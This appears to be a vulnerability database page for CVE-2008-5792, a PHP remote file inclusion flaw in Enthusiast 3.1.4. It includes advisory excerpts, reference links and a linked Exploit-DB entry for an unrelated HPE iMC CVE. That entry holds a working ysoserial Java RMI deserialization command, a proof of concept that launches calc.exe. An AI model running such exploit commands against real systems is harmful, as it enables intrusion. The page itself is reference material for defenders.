CVE-2008-5792
Published 2008-12-31
Priority: P339 · Severity: medium · CVSS 2.0: 6.8
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.57% (83.2th percentile)
PHP remote file inclusion vulnerability in show_joined.php in Indiscripts Enthusiast 3.1.4, and possibly earlier, allows remote attackers to execute arbitrary PHP code via a URL in the path parameter. NOTE: the researcher also points out the analogous directory traversal issue.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| indisguise | indiscripts_enthusiast | <= 3.1.4 | — |
No detection rules found.
Exploit-DB
HPE iMC 7.3 - RMI Java Deserialization
exploitdb·2018-01-30·CVSS 9.8
CVE-2017-5792 [CRITICAL] HPE iMC 7.3 - RMI Java Deserialization
---
# Exploit Title: HPE iMC 7.3 Java RMI Registry Deserialization RCE Vulnerability
# Date: 01-28-2018
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.hpe.com
# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=19068&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
# Version: iMC PLAT v7.3 (E0504) Standard
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-5792
# See Also: http://zerodayinitiative.com/advisories/ZDI-18-137/
# note that this PoC will launch calc.exe
$ java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.1.100 21195 CommonsBeanutils1 calc.exe
Exploit-DB
Enthusiast 3.1.4 - 'show_joined.php' Remote File Inclusion
exploitdb·2008-11-08
CVE-2008-5792 Enthusiast 3.1.4 - 'show_joined.php' Remote File Inclusion
---
########################## www.BugReport.ir #########################
#
# AmnPardaz Security Research Team
#
# Title: Enthusiast 3 Remote Code Execution
# Vendor: http://scripts.indisguise.org/enthusiast/
# Bug: File Inclusion
# Vulnerable Version: 3.1.4 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_57.htm
###################################################################
####################
- Description:
####################
Enthusiast is a full-featured member listing collective management script. It is geared towards fanlisting owners who own multiple fanlistings, but easily customizable for other types of listings as well…
No writeups or analysis indexed.
http://secunia.com/advisories/32628
http://securityreason.com/securityalert/4853
http://www.bugreport.ir/index_57.htm
http://www.securityfocus.com/archive/1/498161/100/0/threaded
http://www.securityfocus.com/bid/32205
http://www.vupen.com/english/advisories/2008/3073
https://exchange.xforce.ibmcloud.com/vulnerabilities/46476
https://www.exploit-db.com/exploits/7059